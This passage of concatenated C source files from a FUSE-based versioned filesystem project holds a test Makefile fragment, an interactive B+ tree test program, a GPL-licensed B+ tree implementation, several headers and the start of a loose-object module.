$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-pack.o \
../pack.o ../loose.o ../sha1.o ../buffer.o ../common.o \
$(ALL_LDFLAGS) $(SHA1_LIB)
test-diff$X: test-diff.o ../diff.o ../common.o $(XDIFF_LIB)
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-diff.o \
../diff.o ../common.o \
$(ALL_LDFLAGS) $(XDIFF_LIB)
test-sha1$X: test-sha1.o ../sha1.o ../common.o $(SHA1_LIB)
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-sha1.o \
../sha1.o ../common.o \
$(ALL_LDFLAGS) $(SHA1_LIB)
test-btree$X: test-btree.o ../btree.o ../common.o
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-btree.o \
../btree.o ../common.o \
$(ALL_LDFLAGS)
test-crc32$X: test-crc32.o ../crc32.o ../common.o
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-crc32.o \
../crc32.o ../common.o \
$(ALL_LDFLAGS)
test-compress$X: test-compress.o ../compress.o ../common.o
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-compress.o \
../compress.o ../common.o \
$(ALL_LDFLAGS)
test-delta$X: test-delta.o ../delta.o ../common.o
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-delta.o \
../delta.o ../common.o \
$(ALL_LDFLAGS)
$(XDIFF_LIB): $(XDIFF_OBJS)
$(QUIET_AR)$(RM) $@ && $(AR) rcs $@ $(XDIFF_OBJS)
$(SHA1_LIB): $(SHA1_OBJS)
$(QUIET_AR)$(RM) $@ && $(AR) rcs $@ $(SHA1_OBJS)
clean:
$(RM) $(ALL_TARGETS) $(BUILD_OBJS) $<
.PHONY: all clean FORCE
<|start_filename|>t/test-btree.c<|end_filename|>
#include "btree.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
int main (int argc, char **argv)
{
char *input_file;
FILE *fp;
node *root;
int input;
char instruction;
bool verbose_output = true;
struct dir_record *dr;
char path[PATH_MAX];
root = NULL;
if (argc > 2) {
input_file = argv[2];
fp = fopen(input_file, "r");
if (fp == NULL) {
perror("Failure to open input file.");
exit(-1);
}
while (!feof(fp)) {
fscanf(fp, "%d %s\n", &input, path);
dr = malloc(sizeof(struct dir_record));
memset(dr, 0, sizeof(struct dir_record)); /* ensure name is NUL-terminated */
memcpy(dr->name, path, strlen(path));
root = insert(root, input, dr);
}
fclose(fp);
print_tree(root);
}
printf("> ");
while (scanf("%c", &instruction) != EOF) {
switch (instruction) {
case 'd':
scanf("%d", &input);
root = delete(root, input);
print_tree(root);
break;
case 'i':
scanf("%d %s", &input, path);
dr = malloc(sizeof(struct dir_record));
memset(dr, 0, sizeof(struct dir_record)); /* ensure name is NUL-terminated */
memcpy(dr->name, path, strlen(path));
root = insert(root, input, dr);
print_tree(root);
break;
case 'f':
case 'p':
scanf("%d", &input);
dr = find(root, input, instruction == 'p');
if (dr == NULL)
printf("Record not found under key %d.\n", input);
else
printf("Record at %lx -- key %d, value %s.\n",
(unsigned long)dr, input, dr->name);
break;
case 'l':
print_leaves(root);
break;
case 'q':
while (getchar() != (int)'\n');
return EXIT_SUCCESS;
case 't':
print_tree(root);
break;
case 'v':
verbose_output = !verbose_output;
break;
case 'x':
destroy_tree(root);
print_tree(NULL);
break;
default:
usage_2();
break;
}
while (getchar() != (int)'\n');
printf("> ");
}
printf("\n");
return 0;
}
<|start_filename|>btree.c<|end_filename|>
#include "btree.h"
/*
*
* bpt: B+ Tree Implementation
* Copyright (C) 2010 <NAME> http://www.amittai.com
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*
* Author: <NAME>
* http://www.amittai.com
* <EMAIL> or <EMAIL>
* Department of Computer Science
* Yale University
* P. O. Box 208285
* New Haven, CT 06520-8285
* Date: 26 June 2010
* Last modified: 28 February 2011
*
* This implementation demonstrates the B+ tree data structure
* for educational purposes, including insertion, deletion, search, and display
* of the search path, the leaves, or the whole tree.
*
* Must be compiled with a C99-compliant C compiler such as the latest GCC.
*
* Usage: bpt [order]
* where order is an optional argument (integer 3 <= order <= 20)
* defined as the maximal number of pointers in any node.
*
*/
// Uncomment the line below if you are compiling on Windows.
// #define WINDOWS
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// GLOBALS.
/*The order determines the maximum and minimum
*number of entries (keys and pointers) in any
*node. Every node has at most order - 1 keys and
*at least (roughly speaking) half that number.
*Every leaf has as many pointers to data as keys,
*and every internal node has one more pointer
*to a subtree than the number of keys.
*This global variable is initialized to the
*default value.
*/
int order = BTREE_ORDER;
/*The queue is used to print the tree in
*level order, starting from the root
*printing each entire rank on a separate
*line, finishing with the leaves.
*/
node *queue = NULL;
/*The user can toggle on and off the "verbose"
*property, which causes the pointer addresses
*to be printed out in hexadecimal notation
*next to their corresponding keys.
*/
bool verbose_output = false;
// FUNCTION DEFINITIONS.
// OUTPUT AND UTILITIES
/*First message to the user.
*/
void usage_1(void)
{
printf("B+ Tree of Order %d.\n", order);
printf("Following Silberschatz, Korth, Sidarshan, Database Concepts, 5th ed.\n\n");
printf("To build a B+ tree of a different order, start again and enter the order\n");
printf("as an integer argument: bpt <order> ");
printf("(3 <= order <=20).\n");
printf("To start with input from a file of newline-delimited integers, \n"
"start again and enter ");
printf("the order followed by the filename:\n"
"bpt <order> <inputfile> .\n");
}
/*Second message to the user.
*/
void usage_2(void)
{
printf("Enter any of the following commands after the prompt > :\n");
printf("\ti <k> -- Insert <k> (an integer) as both key and value).\n");
printf("\tf <k> -- Find the value under key <k>.\n");
printf("\tp <k> -- Print the path from the root to key k and its associated value.\n");
printf("\td <k> -- Delete key <k> and its associated value.\n");
printf("\tx -- Destroy the whole tree. Start again with an empty tree of the same order.\n");
printf("\tt -- Print the B+ tree.\n");
printf("\tl -- Print the keys of the leaves (bottom row of the tree).\n");
printf("\tv -- Toggle output of pointer addresses (\"verbose\") in tree and leaves.\n");
printf("\tq -- Quit. (Or use Ctl-D.)\n");
printf("\t? -- Print this help message.\n");
}
/*Helper function for printing the
*tree out. See print_tree.
*/
void enqueue(node *new_node)
{
node *c;
if (queue == NULL) {
queue = new_node;
queue->next = NULL;
}
else {
c = queue;
while(c->next != NULL) {
c = c->next;
}
c->next = new_node;
new_node->next = NULL;
}
}
/*Helper function for printing the
*tree out. See print_tree.
*/
node *dequeue(void)
{
node *n = queue;
queue = queue->next;
n->next = NULL;
return n;
}
/*Prints the bottom row of keys
*of the tree (with their respective
*pointers, if the verbose_output flag is set).
*/
void print_leaves(node *root)
{
int i;
node *c = root;
if (root == NULL) {
printf("Empty tree.\n");
return;
}
while (!c->is_leaf)
c = c->pointers[0];
while (true) {
for (i = 0; i < c->num_keys; i++) {
if (verbose_output)
printf("%lx ", (unsigned long)c->pointers[i]);
printf("%d ", c->keys[i]);
}
if (verbose_output)
printf("%lx ", (unsigned long)c->pointers[order - 1]);
if (c->pointers[order - 1] != NULL) {
printf(" | ");
c = c->pointers[order - 1];
}
else
break;
}
printf("\n");
}
/*Utility function to give the height
*of the tree, which is the length in number of edges
*of the path from the root to any leaf.
*/
int height(node *root)
{
int h = 0;
node *c = root;
while (!c->is_leaf) {
c = c->pointers[0];
h++;
}
return h;
}
/*Utility function to give the length in edges
*of the path from any node to the root.
*/
int path_to_root(node *root, node *child)
{
int length = 0;
node *c = child;
while (c != root) {
c = c->parent;
length++;
}
return length;
}
/*Prints the B+ tree in the command
*line in level (rank) order, with the
*keys in each node and the '|' symbol
*to separate nodes.
*With the verbose_output flag set,
*the values of the pointers corresponding
*to the keys also appear next to their respective
*keys, in hexadecimal notation.
*/
void print_tree(node *root)
{
node *n = NULL;
int i = 0;
int rank = 0;
int new_rank = 0;
if (root == NULL) {
printf("Empty tree.\n");
return;
}
queue = NULL;
enqueue(root);
while (queue != NULL) {
n = dequeue();
if (n->parent != NULL && n == n->parent->pointers[0]) {
new_rank = path_to_root (root, n);
if (new_rank != rank) {
rank = new_rank;
printf("\n");
}
}
if (verbose_output)
printf("(%lx)", (unsigned long)n);
for (i = 0; i < n->num_keys; i++) {
if (verbose_output)
printf("%lx ", (unsigned long)n->pointers[i]);
printf("%d ", n->keys[i]);
}
if (!n->is_leaf)
for (i = 0; i <= n->num_keys; i++)
enqueue(n->pointers[i]);
if (verbose_output) {
if (n->is_leaf)
printf("%lx ", (unsigned long)n->pointers[order - 1]);
else
printf("%lx ", (unsigned long)n->pointers[n->num_keys]);
}
printf("| ");
}
printf("\n");
}
/*Traces the path from the root to a leaf, searching
*by key. Displays information about the path
*if the verbose flag is set.
*Returns the leaf containing the given key.
*/
node *find_leaf(node *root, uint16_t key, bool verbose)
{
int i = 0;
node *c = root;
if (c == NULL) {
if (verbose)
printf("Empty tree.\n");
return c;
}
while (!c->is_leaf) {
if (verbose) {
printf("[");
for (i = 0; i < c->num_keys - 1; i++)
printf("%d ", c->keys[i]);
printf("%d] ", c->keys[i]);
}
i = 0;
while (i < c->num_keys) {
if (key >= c->keys[i]) i++;
else break;
}
if (verbose)
printf("%d ->\n", i);
c = (node *)c->pointers[i];
}
if (verbose) {
printf("Leaf [");
for (i = 0; i < c->num_keys - 1; i++)
printf("%d ", c->keys[i]);
printf("%d] ->\n", c->keys[i]);
}
return c;
}
/*Finds and returns the record to which
*a key refers.
*/
void *find(node *root, uint16_t key, bool verbose)
{
int i = 0;
node *c = find_leaf (root, key, verbose);
if (c == NULL) return NULL;
for (i = 0; i < c->num_keys; i++)
if (c->keys[i] == key) break;
if (i == c->num_keys)
return NULL;
else
return c->pointers[i];
}
/*Finds the appropriate place to
*split a node that is too big into two.
*/
int cut(int length)
{
if (length % 2 == 0)
return length/2;
else
return length/2 + 1;
}
// INSERTION
/*Creates a new general node, which can be adapted
*to serve as either a leaf or an internal node.
*/
node *make_node(void)
{
node *new_node;
new_node = malloc(sizeof(node));
if (new_node == NULL) {
perror("Node creation.");
exit(EXIT_FAILURE);
}
memset(new_node, 0, sizeof(node));
new_node->keys = malloc ((order - 1) * sizeof(uint16_t));
if (new_node->keys == NULL) {
perror("New node keys array.");
exit(EXIT_FAILURE);
}
new_node->pointers = malloc (order * sizeof(void *));
if (new_node->pointers == NULL) {
perror("New node pointers array.");
exit(EXIT_FAILURE);
}
new_node->is_leaf = false;
new_node->num_keys = 0;
new_node->parent = NULL;
new_node->next = NULL;
return new_node;
}
/*Creates a new leaf by creating a node
*and then adapting it appropriately.
*/
node *make_leaf(void)
{
node *leaf = make_node();
leaf->is_leaf = true;
return leaf;
}
/*Helper function used in insert_into_parent
*to find the index of the parent's pointer to
*the node to the left of the key to be inserted.
*/
int get_left_index(node *parent, node *left)
{
int left_index = 0;
while (left_index <= parent->num_keys &&
parent->pointers[left_index] != left)
left_index++;
return left_index;
}
/*Inserts a new pointer to a record and its corresponding
*key into a leaf.
*Returns the altered leaf.
*/
node *insert_into_leaf(node *leaf, uint16_t key, struct dir_record *pointer)
{
int i, insertion_point;
insertion_point = 0;
while (insertion_point < leaf->num_keys && leaf->keys[insertion_point] < key)
insertion_point++;
for (i = leaf->num_keys; i > insertion_point; i--) {
leaf->keys[i] = leaf->keys[i - 1];
leaf->pointers[i] = leaf->pointers[i - 1];
}
leaf->keys[insertion_point] = key;
leaf->pointers[insertion_point] = pointer;
leaf->num_keys++;
return leaf;
}
/*Inserts a new key and pointer
*to a new record into a leaf so as to exceed
*the tree's order, causing the leaf to be split
*in half.
*/
node *insert_into_leaf_after_splitting(node *root, node *leaf,
uint16_t key, struct dir_record *pointer)
{
node *new_leaf;
uint16_t *temp_keys;
void **temp_pointers;
int insertion_index, split;
uint16_t new_key;
register int i, j;
new_leaf = make_leaf();
temp_keys = malloc (order * sizeof(uint16_t));
if (temp_keys == NULL) {
perror("Temporary keys array.");
exit(EXIT_FAILURE);
}
temp_pointers = malloc (order *sizeof(void *));
if (temp_pointers == NULL) {
perror("Temporary pointers array.");
exit(EXIT_FAILURE);
}
insertion_index = 0;
while (insertion_index < order - 1 && leaf->keys[insertion_index] < key)
insertion_index++;
for (i = 0, j = 0; i < leaf->num_keys; i++, j++) {
if (j == insertion_index) j++;
temp_keys[j] = leaf->keys[i];
temp_pointers[j] = leaf->pointers[i];
}
temp_keys[insertion_index] = key;
temp_pointers[insertion_index] = pointer;
leaf->num_keys = 0;
split = cut(order - 1);
for (i = 0; i < split; i++) {
leaf->pointers[i] = temp_pointers[i];
leaf->keys[i] = temp_keys[i];
leaf->num_keys++;
}
for (i = split, j = 0; i < order; i++, j++) {
new_leaf->pointers[j] = temp_pointers[i];
new_leaf->keys[j] = temp_keys[i];
new_leaf->num_keys++;
}
free(temp_pointers);
free(temp_keys);
new_leaf->pointers[order - 1] = leaf->pointers[order - 1];
leaf->pointers[order - 1] = new_leaf;
for (i = leaf->num_keys; i < order - 1; i++)
leaf->pointers[i] = NULL;
for (i = new_leaf->num_keys; i < order - 1; i++)
new_leaf->pointers[i] = NULL;
new_leaf->parent = leaf->parent;
new_key = new_leaf->keys[0];
return insert_into_parent(root, leaf, new_key, new_leaf);
}
/*Inserts a new key and pointer to a node
*into a node into which these can fit
*without violating the B+ tree properties.
*/
node *insert_into_node(node *root, node *n,
int left_index, uint16_t key, node *right)
{
register int i;
for (i = n->num_keys; i > left_index; i--) {
n->pointers[i + 1] = n->pointers[i];
n->keys[i] = n->keys[i - 1];
}
n->pointers[left_index + 1] = right;
n->keys[left_index] = key;
n->num_keys++;
return root;
}
/*Inserts a new key and a pointer to a node
*into a parent node that is already full, causing
*its size to exceed the order and forcing it to
*split into two.
*/
node *insert_into_node_after_splitting(node *root, node *old_node, int left_index,
uint16_t key, node *right)
{
int split, k_prime;
node *new_node, *child;
uint16_t *temp_keys;
node **temp_pointers;
register int i, j;
/*First create a temporary set of keys and pointers
*to hold everything in order, including
*the new key and pointer, inserted in their
*correct places.
*Then create a new node and copy half of the
*keys and pointers to the old node and
*the other half to the new.
*/
temp_pointers = malloc ((order + 1) *sizeof(node *));
if (temp_pointers == NULL) {
perror("Temporary pointers array for splitting nodes.");
exit(EXIT_FAILURE);
}
temp_keys = malloc (order *sizeof(uint16_t));
if (temp_keys == NULL) {
perror("Temporary keys array for splitting nodes.");
exit(EXIT_FAILURE);
}
for (i = 0, j = 0; i < old_node->num_keys + 1; i++, j++) {
if (j == left_index + 1) j++;
temp_pointers[j] = old_node->pointers[i];
}
for (i = 0, j = 0; i < old_node->num_keys; i++, j++) {
if (j == left_index) j++;
temp_keys[j] = old_node->keys[i];
}
temp_pointers[left_index + 1] = right;
temp_keys[left_index] = key;
/*Create the new node and copy
*half the keys and pointers to the
*old and half to the new.
*/
split = cut(order);
new_node = make_node();
old_node->num_keys = 0;
for (i = 0; i < split - 1; i++) {
old_node->pointers[i] = temp_pointers[i];
old_node->keys[i] = temp_keys[i];
old_node->num_keys++;
}
old_node->pointers[i] = temp_pointers[i];
k_prime = temp_keys[split - 1];
for (++i, j = 0; i < order; i++, j++) {
new_node->pointers[j] = temp_pointers[i];
new_node->keys[j] = temp_keys[i];
new_node->num_keys++;
}
new_node->pointers[j] = temp_pointers[i];
free(temp_pointers);
free(temp_keys);
new_node->parent = old_node->parent;
for (i = 0; i <= new_node->num_keys; i++) {
child = new_node->pointers[i];
child->parent = new_node;
}
/*Insert a new key into the parent of the two
*nodes resulting from the split, with
*the old node to the left and the new to the right.
*/
return insert_into_parent(root, old_node, k_prime, new_node);
}
/*Inserts a new key and node pointer into the parent
*of the two nodes produced by a split (creating a new
*root if necessary).
*Returns the root of the tree after insertion.
*/
node *insert_into_parent(node *root, node *left, uint16_t key, node *right)
{
int left_index;
node *parent;
parent = left->parent;
/*Case: new root. */
if (parent == NULL)
return insert_into_new_root(left, key, right);
/*Case: leaf or node. (Remainder of
*function body.)
*/
/*Find the parent's pointer to the left
*node.
*/
left_index = get_left_index(parent, left);
/*Simple case: the new key fits into the node.
*/
if (parent->num_keys < order - 1)
return insert_into_node(root, parent, left_index, key, right);
/*Harder case: split a node in order
*to preserve the B+ tree properties.
*/
return insert_into_node_after_splitting(root, parent, left_index, key, right);
}
/*Creates a new root for two subtrees
*and inserts the appropriate key into
*the new root.
*/
node *insert_into_new_root(node *left, uint16_t key, node *right)
{
node *root = make_node();
root->keys[0] = key;
root->pointers[0] = left;
root->pointers[1] = right;
root->num_keys++;
root->parent = NULL;
left->parent = root;
right->parent = root;
return root;
}
/*First insertion:
*start a new tree.
*/
node *start_new_tree(uint16_t key, struct dir_record *pointer)
{
node *root = make_leaf();
root->keys[0] = key;
root->pointers[0] = pointer;
root->pointers[order - 1] = NULL;
root->parent = NULL;
root->num_keys++;
return root;
}
/*Master insertion function.
*Inserts a key and an associated value into
*the B+ tree, causing the tree to be adjusted
*however necessary to maintain the B+ tree
*properties.
*/
node *insert(node *root, uint16_t key, void *value)
{
struct dir_record *pointer;
node *leaf;
/*The current implementation ignores
*duplicates.
*/
if (find(root, key, false) != NULL)
return root;
/*The caller already supplies a record;
*use it directly as the leaf pointer.
*/
pointer = value;
/*Case: the tree does not exist yet.
*Start a new tree.
*/
if (root == NULL)
return start_new_tree(key, pointer);
/*Case: the tree already exists.
*(Rest of function body.)
*/
leaf = find_leaf(root, key, false);
/*Case: leaf has room for key and pointer.
*/
if (leaf->num_keys < order - 1) {
leaf = insert_into_leaf(leaf, key, pointer);
return root;
}
/*Case: leaf must be split.
*/
return insert_into_leaf_after_splitting(root, leaf, key, pointer);
}
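/*Illustrative usage sketch (compiled out): how the insertion API above
*composes. The first insert() starts a new tree, later calls split
*leaves and internal nodes as needed, and find() retrieves the stored
*value. The key values and the make_dr() call (from fstree.c) are
*purely for illustration.
*/
#if 0
static void insert_example(void)
{
node *root = NULL;
struct dir_record *dr = make_dr("/example");
root = insert(root, 42, dr);
root = insert(root, 7, dr);
if (find(root, 42, false) != NULL)
printf("key 42 present\n");
destroy_tree(root);
}
#endif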
// DELETION.
/*Utility function for deletion. Retrieves
*the index of a node's nearest neighbor (sibling)
*to the left if one exists. If not (the node
*is the leftmost child), returns -1 to signify
*this special case.
*/
int get_neighbor_index(node *n)
{
register int i;
/*Return the index of the key to the left
*of the pointer in the parent pointing
*to n.
*If n is the leftmost child, this means
*return -1.
*/
for (i = 0; i <= n->parent->num_keys; i++)
if (n->parent->pointers[i] == n)
return i - 1;
// Error state.
printf("Search for nonexistent pointer to node in parent.\n");
printf("Node: %#lx\n", (unsigned long)n);
exit(EXIT_FAILURE);
}
node *remove_entry_from_node(node *n, uint16_t key, node *pointer)
{
register int i, num_pointers;
// Remove the key and shift other keys accordingly.
i = 0;
while (n->keys[i] != key)
i++;
for (++i; i < n->num_keys; i++)
n->keys[i - 1] = n->keys[i];
// Remove the pointer and shift other pointers accordingly.
// First determine number of pointers.
num_pointers = n->is_leaf ? n->num_keys : n->num_keys + 1;
i = 0;
while (n->pointers[i] != pointer)
i++;
for (++i; i < num_pointers; i++)
n->pointers[i - 1] = n->pointers[i];
// One key fewer.
n->num_keys--;
// Set the other pointers to NULL for tidiness.
// A leaf uses the last pointer to point to the next leaf.
if (n->is_leaf)
for (i = n->num_keys; i < order - 1; i++)
n->pointers[i] = NULL;
else
for (i = n->num_keys + 1; i < order; i++)
n->pointers[i] = NULL;
return n;
}
node *adjust_root(node *root)
{
node *new_root;
/*Case: nonempty root.
*Key and pointer have already been deleted,
*so nothing to be done.
*/
if (root->num_keys > 0)
return root;
/*Case: empty root.
*/
// If it has a child, promote
// the first (only) child
// as the new root.
if (!root->is_leaf) {
new_root = root->pointers[0];
new_root->parent = NULL;
}
// If it is a leaf (has no children),
// then the whole tree is empty.
else
new_root = NULL;
free(root->keys);
free(root->pointers);
free(root);
return new_root;
}
/*Coalesces a node that has become
*too small after deletion
*with a neighboring node that
*can accept the additional entries
*without exceeding the maximum.
*/
node *coalesce_nodes(node *root, node *n, node *neighbor, int neighbor_index, int k_prime)
{
int neighbor_insertion_index, n_start, n_end, new_k_prime = 0;
node *tmp;
bool split;
register int i, j;
/*Swap neighbor with node if node is on the
*extreme left and neighbor is to its right.
*/
if (neighbor_index == -1) {
tmp = n;
n = neighbor;
neighbor = tmp;
}
/*Starting point in the neighbor for copying
*keys and pointers from n.
*Recall that n and neighbor have swapped places
*in the special case of n being a leftmost child.
*/
neighbor_insertion_index = neighbor->num_keys;
/*
*Nonleaf nodes may sometimes need to remain split,
*if the insertion of k_prime would cause the resulting
*single coalesced node to exceed the limit order - 1.
*The variable split is always false for leaf nodes
*and only sometimes set to true for nonleaf nodes.
*/
split = false;
/*Case: nonleaf node.
*Append k_prime and the following pointer.
*If there is room in the neighbor, append
*all pointers and keys from the neighbor.
*Otherwise, append only cut(order) - 2 keys and
*cut(order) - 1 pointers.
*/
if (!n->is_leaf) {
/*Append k_prime.
*/
neighbor->keys[neighbor_insertion_index] = k_prime;
neighbor->num_keys++;
/*Case (default): there is room for all of n's keys and pointers
*in the neighbor after appending k_prime.
*/
n_end = n->num_keys;
/*Case (special): k_prime cannot fit with all the other keys and pointers
*into one coalesced node.
*/
n_start = 0; // Only used in this special case.
if (n->num_keys + neighbor->num_keys >= order) {
split = true;
n_end = cut(order) - 2;
}
for (i = neighbor_insertion_index + 1, j = 0; j < n_end; i++, j++) {
neighbor->keys[i] = n->keys[j];
neighbor->pointers[i] = n->pointers[j];
neighbor->num_keys++;
n->num_keys--;
n_start++;
}
/*The number of pointers is always
*one more than the number of keys.
*/
neighbor->pointers[i] = n->pointers[j];
/*If the nodes are still split, remove the first key from
*n.
*/
if (split) {
new_k_prime = n->keys[n_start];
for (i = 0, j = n_start + 1; i < n->num_keys; i++, j++) {
n->keys[i] = n->keys[j];
n->pointers[i] = n->pointers[j];
}
n->pointers[i] = n->pointers[j];
n->num_keys--;
}
/*All children must now point up to the same parent.
*/
for (i = 0; i < neighbor->num_keys + 1; i++) {
tmp = (node *)neighbor->pointers[i];
tmp->parent = neighbor;
}
}
/*In a leaf, append the keys and pointers of
*n to the neighbor.
*Set the neighbor's last pointer to point to
*what had been n's right neighbor.
*/
else {
for (i = neighbor_insertion_index, j = 0; j < n->num_keys; i++, j++) {
neighbor->keys[i] = n->keys[j];
neighbor->pointers[i] = n->pointers[j];
neighbor->num_keys++;
}
neighbor->pointers[order - 1] = n->pointers[order - 1];
}
if (!split) {
root = delete_entry(root, n->parent, k_prime, n);
free(n->keys);
free(n->pointers);
free(n);
}
else
for (i = 0; i < n->parent->num_keys; i++)
if (n->parent->pointers[i + 1] == n) {
n->parent->keys[i] = new_k_prime;
break;
}
return root;
}
/*Redistributes entries between two nodes when
*one has become too small after deletion
*but its neighbor is too big to append the
*small node's entries without exceeding the
*maximum.
*/
node *redistribute_nodes(node *root, node *n, node *neighbor, int neighbor_index,
int k_prime_index, int k_prime)
{
register int i;
node *tmp;
/*Case: n has a neighbor to the left.
*Pull the neighbor's last key-pointer pair over
*from the neighbor's right end to n's left end.
*/
if (neighbor_index != -1) {
if (!n->is_leaf)
n->pointers[n->num_keys + 1] = n->pointers[n->num_keys];
for (i = n->num_keys; i > 0; i--) {
n->keys[i] = n->keys[i - 1];
n->pointers[i] = n->pointers[i - 1];
}
if (!n->is_leaf) {
n->pointers[0] = neighbor->pointers[neighbor->num_keys];
tmp = (node *)n->pointers[0];
tmp->parent = n;
neighbor->pointers[neighbor->num_keys] = NULL;
n->keys[0] = k_prime;
n->parent->keys[k_prime_index] = neighbor->keys[neighbor->num_keys - 1];
}
else {
n->pointers[0] = neighbor->pointers[neighbor->num_keys - 1];
neighbor->pointers[neighbor->num_keys - 1] = NULL;
n->keys[0] = neighbor->keys[neighbor->num_keys - 1];
n->parent->keys[k_prime_index] = n->keys[0];
}
}
/*Case: n is the leftmost child.
*Take a key-pointer pair from the neighbor to the right.
*Move the neighbor's leftmost key-pointer pair
*to n's rightmost position.
*/
else {
if (n->is_leaf) {
n->keys[n->num_keys] = neighbor->keys[0];
n->pointers[n->num_keys] = neighbor->pointers[0];
n->parent->keys[k_prime_index] = neighbor->keys[1];
}
else {
n->keys[n->num_keys] = k_prime;
n->pointers[n->num_keys + 1] = neighbor->pointers[0];
tmp = (node *)n->pointers[n->num_keys + 1];
tmp->parent = n;
n->parent->keys[k_prime_index] = neighbor->keys[0];
}
for (i = 0; i < neighbor->num_keys; i++) {
neighbor->keys[i] = neighbor->keys[i + 1];
neighbor->pointers[i] = neighbor->pointers[i + 1];
}
if (!n->is_leaf)
neighbor->pointers[i] = neighbor->pointers[i + 1];
}
/*n now has one more key and one more pointer;
*the neighbor has one fewer of each.
*/
n->num_keys++;
neighbor->num_keys--;
return root;
}
/*Deletes an entry from the B+ tree.
*Removes the record and its key and pointer
*from the leaf, and then makes all appropriate
*changes to preserve the B+ tree properties.
*/
node *delete_entry(node *root, node *n, uint16_t key, void *pointer)
{
int min_keys;
node *neighbor;
int neighbor_index;
int k_prime_index, k_prime;
int capacity;
// Remove key and pointer from node.
n = remove_entry_from_node(n, key, pointer);
/*Case: deletion from the root.
*/
if (n == root)
return adjust_root(root);
/*Case: deletion from a node below the root.
*(Rest of function body.)
*/
/*Determine minimum allowable size of node,
*to be preserved after deletion.
*/
min_keys = n->is_leaf ? cut(order - 1) : cut(order) - 1;
/*Case: node stays at or above minimum.
*(The simple case.)
*/
if (n->num_keys >= min_keys)
return root;
/*Case: node falls below minimum.
*Either coalescence or redistribution
*is needed.
*/
/*Find the appropriate neighbor node with which
*to coalesce.
*Also find the key (k_prime) in the parent
*between the pointer to node n and the pointer
*to the neighbor.
*/
neighbor_index = get_neighbor_index (n);
k_prime_index = neighbor_index == -1 ? 0 : neighbor_index;
k_prime = n->parent->keys[k_prime_index];
neighbor = neighbor_index == -1 ? n->parent->pointers[1] :
n->parent->pointers[neighbor_index];
capacity = n->is_leaf ? order : order - 1;
/*Coalescence. */
if (neighbor->num_keys + n->num_keys < capacity)
return coalesce_nodes(root, n, neighbor, neighbor_index, k_prime);
/*Redistribution. */
else
return redistribute_nodes(root, n, neighbor, neighbor_index, k_prime_index, k_prime);
}
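/*Worked example of the thresholds above with BTREE_ORDER == 3, assuming
*cut() rounds halves up (cut(n) == (n + 1) / 2):
*leaf: min_keys = cut(order - 1) = cut(2) = 1, and two leaves coalesce
*only when they hold fewer than order = 3 keys combined;
*internal: min_keys = cut(order) - 1 = 2 - 1 = 1, and two nodes coalesce
*only when they hold fewer than order - 1 = 2 keys combined (the
*pulled-down k_prime accounts for the extra slot).
*Anything larger is handled by redistribute_nodes() instead.
*/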
node *delete(node *root, uint16_t key)
{
node *key_leaf;
struct dir_record *key_record;
key_record = find(root, key, false);
key_leaf = find_leaf(root, key, false);
if (key_record != NULL && key_leaf != NULL) {
root = delete_entry(root, key_leaf, key, key_record);
free(key_record);
}
return root;
}
void destroy_tree(node *root)
{
register int i;
if (root->is_leaf)
for (i = 0; i < root->num_keys; i++)
free(root->pointers[i]);
else
for (i = 0; i < root->num_keys + 1; i++)
destroy_tree(root->pointers[i]);
free(root->pointers);
free(root->keys);
free(root);
}
<|start_filename|>fuse.h<|end_filename|>
#ifndef FUSE_H_
#define FUSE_H_
#define FUSE_USE_VERSION 26
#define _XOPEN_SOURCE 500
#define PHOENIXFS_MAGIC 0x2888
#ifndef DT_DIR
#define DT_DIR 4
#endif
#include <sys/stat.h>
#include <unistd.h>
#include <time.h>
#include <stdio.h>
#include <fuse.h>
#include "common.h"
#include "sha1.h"
#include "buffer.h"
#include "btree.h"
#include "fstree.h"
#include "compress.h"
#include "pack.h"
int phoenixfs_fuse(int argc, char *argv[]);
#define ROOTENV ((struct env_t *) fuse_get_context()->private_data)
#endif
<|start_filename|>persist.h<|end_filename|>
#ifndef PERSIST_H_
#define PERSIST_H_
#include "common.h"
#include "btree.h"
#include <stdio.h>
void dump_dr_tree(struct node *root, FILE *outfile);
struct node *load_dr_tree(FILE *infile);
/* From fstree.c */
struct dir_record *make_dr(const char *path);
struct vfile_record *make_vfr(const char *path);
#endif
<|start_filename|>buffer.h<|end_filename|>
#ifndef BUFFER_H_
#define BUFFER_H_
#include <stdio.h>
#include <unistd.h>
#define CHUNK 16384
off_t buffer_skip_bytes(FILE *src, off_t size);
off_t buffer_copy_bytes(FILE *src, FILE *dst, size_t size);
#endif
<|start_filename|>loose.c<|end_filename|>
#include "loose.h"
#include <limits.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <sys/stat.h>
struct loose_buf looseroot = {0, NULL};
static char xpath[PATH_MAX];
void add_loose_entry(const unsigned char *sha1, size_t size)
{
uint32_t this_nr;
char sha1_digest[40];
this_nr = looseroot.nr;
print_sha1(sha1_digest, sha1);
looseroot.entries = realloc(looseroot.entries, (this_nr + 1) *
sizeof(struct pack_idx_entry *));
PHOENIXFS_DBG("add_loose_entry:: %s [%d]", sha1_digest, this_nr);
looseroot.entries[this_nr] = malloc(sizeof(struct pack_idx_entry));
memset(looseroot.entries[this_nr], 0, (sizeof(struct pack_idx_entry)));
memcpy(looseroot.entries[this_nr]->sha1, sha1, 20);
looseroot.entries[this_nr]->size = size;
looseroot.nr ++;
}
/**
* Format:
* <> = [sha1 | delta_bit | size | data]
*/
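/*
* Sketch of one entry as written by the loop below, with field sizes as
* on a typical 64-bit build (the delta bit is currently always false,
* pending real delta generation):
*
*   20 bytes   raw SHA1 of the object
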